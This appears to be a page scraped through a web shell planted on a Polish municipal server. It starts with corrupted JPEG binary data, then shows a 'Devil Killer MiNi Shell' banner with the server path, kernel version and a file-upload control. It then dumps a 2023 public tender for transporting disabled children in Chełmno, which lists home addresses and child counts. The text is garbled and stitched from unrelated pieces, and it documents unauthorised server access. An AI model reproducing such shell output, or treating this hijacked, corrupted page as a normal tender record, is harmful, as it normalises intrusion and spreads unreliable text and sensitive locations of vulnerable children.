JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230802/0033663601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych z terenu Gminy Miasto Chełmno do Specjalnego Ośrodka Szkolno-Wychowawczego w Chełmnie i opieka <br/>w trakcie przewozu w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM OBSŁUGI PLACÓWEK OŚWIATOWYCH W CHEŁMNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368602515</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełmno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.copo@chelmno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.chelmno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych z terenu Gminy Miasto Chełmno do Specjalnego Ośrodka Szkolno-Wychowawczego w Chełmnie i opieka <br/>w trakcie przewozu w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee2aa440-310a-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00336636</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00303291/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz dzieci niepełnosprawnych z terenu Gminy Miasto Chełmno do SOSzW i opieka w trakcie przewozu w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/544804 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/544804</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne<br/>wymagania sprzętowo-aplikacyjne, umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Centrum Obsługi Placówek Oświatowych w<br/>Chełmnie (dalej: „ADMINISTRATOR”), z siedzibą: ul. Tadeusza Kościuszki 11, 86-200 Chełmno. Z Administratorem można się<br/>kontaktować pisemnie, za pomocą poczty tradycyjnej na adres: ul. Tadeusza Kościuszki 11, 86-200 Chełmno lub drogą e-mailową<br/>pod adresem: sekretariat.copo@chelmno.pl<br/>2. Administrator wyznaczył Inspektora Ochrony Danych - Andrzeja Rybus-Tołłoczko, z którym można się skontaktować pod adresem<br/>mailowym: iodo@rt-net.pl.<br/>3. Dane osobowe są przetwarzane na podstawie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) oraz ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych.<br/>4. Przetwarzanie danych osobowych odbywa się w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego – art.<br/>6 ust. 1 lit. c, e RODO - dane osobowe będą przetwarzane przez Administratora do 5 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, zgodnie z przepisami prawa.<br/>5. Dane osobowe nie pochodzą od stron trzecich.<br/>6. Administrator nie zamierza przekazywać danych do państwa trzeciego lub organizacji międzynarodowej.<br/>7. Administrator będzie przekazywał dane osobowe innym podmiotom, tylko na podstawie przepisów prawa, w tym w szczególności<br/>do: Urzędu Zamówień Publicznych, organów kontrolnych, a także na podstawie zawartych umów powierzenia przetwarzania danych<br/>osobowych, w tym do dostawców usług teleinformatycznych.<br/>8. Osoba, której dane dotyczą ma prawo do żądania od administratora dostępu do danych osobowych, ich sprostowania, usunięcia<br/>lub ograniczenia przetwarzania oraz o prawo do wniesienia sprzeciwu wobec przetwarzania, a także prawo do przenoszenia danych.<br/>9. Skargę nas działania Administratora można wnieść do Prezesa Urzędu Ochrony Danych Osobowych.<br/>10. Podanie danych osobowych jest wymogiem udziału w postępowaniu o udzielenie zamówienia. Ich niepodanie spowoduje brak<br/>możliwości udziału w postępowaniu.<br/>11. Administrator nie przewiduje zautomatyzowanego podejmowania decyzji</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OK. 343.2.2023.AL</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Dowóz dzieci z terenu Gminy Miasta Chełmna do Specjalnego Ośrodka Szkolno– Wychowawczego w Chełmnie, ul. Parkowa 5 i ul. Dworcowa 20<br/>2)	Zapewnienie dzieciom opieki w trakcie przewozu.<br/>5. Szczegółowy zakres usługi do wykonania w ramach zamówienia obejmuje:<br/>1)	Zapewnienie dowozu wraz z opieką dla 17 dzieci niepełnosprawnych przystosowanymi pod względem technicznym do tego celu pojazdami samochodowymi właściwymi do przewozu osób niepełnosprawnych, dostosowanymi do stopnia niepełnosprawności, wyposażonymi w odpowiedni sprzęt ułatwiający wsiadanie i wysiadanie, w tym dziecku/uczniowi poruszającemu się na wózku inwalidzkim, tj. wind lub najazdów dla wózków inwalidzkich oraz odpowiednie zabezpieczenie dla przewozu dzieci/uczniów i wózków oraz pasy bezpieczeństwa biodrowo – barkowe do przypinania dzieci/uczniów znajdujących się na wózkach, najazdy teleskopowe z powłoką antypoślizgową umożliwiającą wprowadzenie wózków do pojazdu lub inne specjalistyczne pochylnie.<br/><br/>2)	Liczba dzieci – 17 osób w tym dzieci na wózkach inwalidzkich.<br/>Rano dowóz przed rozpoczęciem zajęć z domu oraz po zakończeniu zajęć dowóz do domu.<br/>3)	Miejsce zamieszkania dzieci:<br/>LP. ADRES LICZBA DZIECI PRZEDSZKOLE, SZKOŁA UWAGI<br/>1. ul. Danielewskiego 1, liczba dzieci 2, Przedszkole SOSzW – ul. Parkowa<br/>2. ul. Wodna 6, liczba dzieci 1, SOSzW – ul. Parkowa<br/>3. ul. Chociszewskiego 5, liczba dzieci 1, SOSzW – ul. Parkowa Dziecko na wózku<br/>4. ul. Osnowska 59, liczba dzieci 1, Przedszkole, SOSzW – ul. Parkowa<br/>5. ul. Osnowska 59, liczba dzieci 2, Przedszkole, SOSzW – ul. Dworcowa<br/>6. ul. Toruńska 5, liczba dzieci 1, SOSzW – ul. Parkowa<br/>7. ul. Bociania 9, liczba dzieci 1, SOSzW – ul. Dworcowa<br/>8. ul. Św. Ducha 2, liczba dzieci 1, Przedszkole SOSZW – ul. Parkowa<br/>9. ul. Hallera 14, liczba dzieci 1, Przedszkole<br/>SOSzW – ul. Parkowa<br/>10. ul. Dominikańska 40, liczba dzieci 3, SOSzW – ul. Parkowa<br/>11. ul. Dominikańska 40, liczba dzieci 3, SOSzW – ul. Dworcowa W tym dwoje uczniów na wózkach<br/>Łączna liczba dzieci 17<br/>Zamawiający zastrzega sobie prawo do zmian osobowych, w tym do zmniejszenia liczby dzieci/uczniów lub zwiększenia liczby dzieci/uczniów nie więcej jednak niż o 3 dzieci/uczniów, zmian adresów zamieszkania dowożonych dzieci/uczniów. O każdej zmianie Zamawiający poinformuje Wykonawcę na piśmie, podając wymagane dane.<br/>6. Poza zakresem usług określonym w ust. 4, Wykonawca zobowiązany jest wykonać i ująć<br/> w cenie oferty następujące czynności:<br/>1)	Realizacja całego zakresu usług powinna być wykonana przez Wykonawcę w oparciu o obowiązujące przepisy prawa, w tym o transporcie drogowym, BHP i p.poż.<br/>2)	Dzieci mają być dowożone do miejsca nauki w czasie zapewniającym punktualne rozpoczęcie zajęć lekcyjnych zgodnie z obowiązującym w szkole planem nauczania.<br/>3)	Po zakończeniu zajęć dzieci mają zostać odebrane z miejsca nauki.<br/>4)	Szczegóły dowozu np. godziny Wykonawca ustali z rodzicami – opiekunami dziecka uwzględniając odbiór dziecka rano oraz odbiór dziecka po zakończeniu zajęć.<br/>5)	Wykonawca w czasie dowozu dzieci ma zapewnić opiekę osoby pełnoletniej. Opieka nad dziećmi ma być sprawowana przez cały czas dowozu tj. na całej trasie z miejsca zamieszkania do miejsca nauki i z powrotem. Osoba sprawująca opiekę ma posiadać ważne badania lekarskie, przeszkolenie w zakresie przepisów BHP i p.poż. oraz <br/>w zakresie udzielania pierwszej pomocy przedmedycznej. <br/><br/>a)	opiekun będzie odbierał dzieci/uczniów od rodziców (opiekunów) spod domu (budynku) i po odwiezieniu do placówki oświatowej będzie pomagał dzieciom/uczniom wysiadać z samochodu, a następnie przekazywał dzieci/uczniów pod opiekę nauczyciela,<br/><br/>b)	po zakończeniu zajęć opiekun będzie odbierał dzieci/uczniów od nauczyciela, pomagał wsiadać do samochodu i po dowiezieniu pod dom (budynek) przekazywał pod opiekę rodziców (opiekunów);<br/>6)	Wymaga się, aby opiekun oraz kierowca nie figurował w rejestrze sprawców na tle seksualnym zgodnie ustawą z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczości na tle seksualnym (Dz.U. z 2023 r. poz. 31 ze zm.) - do wglądu przed podpisaniem umowy.<br/><br/>7. Wykonawca zobowiązany jest:<br/>1) bezwzględnie przestrzegać i stosować przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2019r. poz. 1781) oraz przepisy rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), a w tym przetwarzać posiadane dane osobowe jedynie w celu związanym z wykonywaniem umowy o dowóz oraz zabezpieczyć je w sposób zgodny z prawem przed dostępem osób nieuprawnionych;<br/><br/>2) posiadać właściwe zezwolenie lub licencję na wykonywanie transportu drogowego osób, jak też przestrzegać zasad ruchu drogowego;<br/><br/>3) działać w sposób racjonalny, tj. łączyć w grupy dzieci/uczniów na tej samej trasie <br/>i w zbliżonych terminach dowozu, zapewniając jednocześnie możliwie najkrótszy czas przebywania dziecka/ucznia w podróży; <br/><br/>8. Wykonawca gwarantuje, że usługi będą świadczone przy użyciu pojazdów samochodowych przystosowanych do przewozów osób niepełnosprawnych:<br/>1)	wszystkie samochody, którymi przewożone są dzieci/uczniowie są odpowiednio oznakowane;<br/><br/>2) wszystkie samochody ze stosownym dowodem rejestracyjnym, którymi przewożone są dzieci/uczniowie posiadają obowiązkowe ubezpieczenie komunikacyjne OC i NNW oraz aktualne badania techniczne– kopię wraz z odpowiednim potwierdzenie zapłaty, Wykonawca przekazuje Zamawiającemu w dniu podpisania umowy.<br/><br/>9. Wykonawca zapewni transport wózków inwalidzkich tych dzieci/uczniów, które mają udokumentowany problem z samodzielnym poruszaniem się.<br/>10.	Wykonawca w ramach przedmiotowej usługi zgodnie z ustawą z dnia 6 września 2001 r.<br/>o transporcie drogowym zatrudni kierowców posiadających odpowiednie uprawnienie do kierowania pojazdem samochodowym określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym i przeszkolenie w zakresie pierwszej pomocy.<br/>11.	Osobą powołaną do sprawowania opieki nad dziećmi/uczniami nie może być kierowca pojazdu.<br/>12.	Kierowcy Wykonawcy skierowani do wykonania przedmiotowych usług posiadają właściwe uprawnienia w tym aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy wydane przez uprawnionego lekarza do badania kierowców oraz posiadają zaświadczenie o przeszkoleniu w zakresie przepisów BHP i ppoż.<br/>13.	Wykonawca bierze na siebie odpowiedzialność za zrekompensowanie szkód wynikających <br/>z wypadków lub wszelkiego rodzaju zdarzeń wynikłych w czasie wykonywania usługi. Jest zobowiązany do naprawienia szkody powstałej na skutek wypadku i zdarzeń mających miejsce w trakcie wykonywania usługi z winy Wykonawcy. Wykonawca w pełnym okresie realizacji umowy będzie posiadał aktualną polisę/umowę OC w zakresie prowadzonej działalności, której kopię wraz z potwierdzenie zapłaty, przekazuje Zamawiającemu w dniu podpisania umowy i w przypadku konieczności dokonania stosownego przedłużenia terminu jej ważności zobowiązuje się do dokonania przedłużenia ważności polisy na czas obowiązywania umowy.<br/><br/>14.	W przypadku czasowej niemożności świadczenia usług przewozowych z uzasadnionych<br/>przyczyn, Wykonawca, w terminie określonym w formularzu ofertowym, zobowiązuje się do niezwłocznego zorganizowania zastępstwa zapewniającego równorzędny poziom usług. Przez uzasadnione przyczyny strony rozumieją np. awarię techniczną pojazdu.<br/><br/>15.	Wykonawca, w przypadku czasowej niemożności świadczenia usług przewozowych, <br/>o których mowa w punkcie 14 i wynikających z tego opóźnień w przewozie dziecka w drodze z domu do szkoły lub ze szkoły do domu, zobowiązany jest powiadomić o tym fakcie odpowiednio rodziców lub sekretariat szkoły. <br/><br/>16. W przypadku, o którym mowa w pkt. 14 Zamawiający nie ponosi odpowiedzialności za rozliczenia Wykonawcy z organizatorem transportu zastępczego.<br/><br/>17.	Osoby wykonujące usługę powinny przedstawić aktualne zaświadczenia o odbytych szkoleniach o których mowa w pkt. 6 ppkt. 5 i 6 oraz 12, przed podpisaniem umowy.<br/><br/>18.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w projektowanych postanowieniach umowy, stanowiących załącznik nr 8 do SWZ, które zostaną wprowadzone do treści zawartej umowy. <br/><br/>19.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy pod warunkiem, że podwykonawca spełni wszystkie wymagania przewidziane dla wykonawcy w niniejszym postępowaniu przetargowym.<br/><br/>20.	Zamawiający, na podstawie art. 462 ust. 1 i 2 ustawy Pzp, żąda wskazania przez Wykonawcę w formularzu ofertowym części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podania przez Wykonawcę nazw (firm) ewentualnych podwykonawców - jeżeli są już znani na tym etapie.<br/><br/>21.	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy <br/>z odpowiedzialności za należyte wykonanie tego zamówienia (art. 462 ust 8 ustawy Pzp).<br/><br/>22.	Zamawiający wyznaczył termin składania ofert z uwzględnieniem czasu niezbędnego do zapoznania się przez Wykonawców z informacjami koniecznymi do przygotowania oferty i termin ten jest dłuższy od minimalnego terminu składania ofert określonego w ustawie.<br/><br/>23.	Postępowanie oznaczone jest znakiem: Sprawa nr: OK.343.2.2023.AL Wykonawcy powinni we wszystkich kontaktach z Zamawiającym powoływać się na wyżej podane oznaczenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na zorganizowanie transportu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Wykonawca musi wykazać, że posiada odpowiednie zezwolenie lub licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r. poz. 2021 ze zm.). <br/>4)	Zdolności technicznej lub zawodowej:<br/><br/>	a) Doświadczenie:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 (trzech) lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/>- świadczył usługi dowozu dzieci niepełnosprawnych przez co najmniej jeden rok szkolny ( wrzesień- czerwiec) .<br/>Wykonawca musi wykazać również, że posiada zdolności techniczne i zawodowe:<br/>- posiada lub zapewni samochód przystosowany do przewozu osób niepełnosprawnych, mający możliwość przewozu wózka inwalidzkiego.<br/>Samochód ten winien być oznakowany zgodnie z przepisami, spełniać wymogi bezpieczeństwa, a także posiadać ważne ubezpieczenie odpowiedzialności cywilnej<br/> i następstw nieszczęśliwych wypadków (NNW) oraz aktualne badanie techniczne,<br/><br/> b) Zasoby ludzkie zdolne do realizacji przedmiotu zamówienia:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, w tym:<br/>- posiadającą ukończony kurs pierwszej pomocy przedlekarskiej i co najmniej w okresie jednego roku szkolnego (wrzesień- czerwiec) doświadczenie w pracy przy przewozach osób niepełnosprawnych, celem pełnienia roli opiekuna uczniów niepełnosprawnych,<br/>- 